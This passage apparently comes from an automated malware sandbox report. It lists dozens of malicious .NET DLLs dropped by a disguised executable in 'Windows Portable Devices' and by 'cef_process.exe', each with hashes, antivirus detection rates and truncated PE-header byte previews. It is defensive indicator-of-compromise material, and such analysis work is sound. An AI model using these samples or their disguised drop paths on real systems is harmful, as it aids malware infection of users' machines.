                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):126976
                                                                Entropy (8bit):6.057993947082715
                                                                Encrypted:false
                                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.660491370279985
                                                                Encrypted:false
                                                                SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                MD5:240E98D38E0B679F055470167D247022
                                                                SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33792
                                                                Entropy (8bit):5.541771649974822
                                                                Encrypted:false
                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):64000
                                                                Entropy (8bit):5.857602289000348
                                                                Encrypted:false
                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34304
                                                                Entropy (8bit):5.618776214605176
                                                                Encrypted:false
                                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):39936
                                                                Entropy (8bit):5.629584586954759
                                                                Encrypted:false
                                                                SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 13%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34304
                                                                Entropy (8bit):5.618776214605176
                                                                Encrypted:false
                                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34816
                                                                Entropy (8bit):5.636032516496583
                                                                Encrypted:false
                                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):294912
                                                                Entropy (8bit):6.010605469502259
                                                                Encrypted:false
                                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):5.932541123129161
                                                                Encrypted:false
                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):36352
                                                                Entropy (8bit):5.668291349855899
                                                                Encrypted:false
                                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38400
                                                                Entropy (8bit):5.699005826018714
                                                                Encrypted:false
                                                                SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                MD5:87765D141228784AE91334BAE25AD743
                                                                SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):40448
                                                                Entropy (8bit):5.7028690200758465
                                                                Encrypted:false
                                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):50176
                                                                Entropy (8bit):5.723168999026349
                                                                Encrypted:false
                                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):34816
                                                                Entropy (8bit):5.636032516496583
                                                                Encrypted:false
                                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.41854385721431
                                                                Encrypted:false
                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):64000
                                                                Entropy (8bit):5.857602289000348
                                                                Encrypted:false
                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):24576
                                                                Entropy (8bit):5.535426842040921
                                                                Encrypted:false
                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):38400
                                                                Entropy (8bit):5.699005826018714
                                                                Encrypted:false
                                                                SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                MD5:87765D141228784AE91334BAE25AD743
                                                                SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\RuntimeDll\cef_process.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33280
                                                                Entropy (8bit):5.634433516692816
                                                                Encrypted:false
                                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 12%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):342528
                                                                Entropy (8bit):6.170134230759619
                                                                Encrypted:false
                                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe
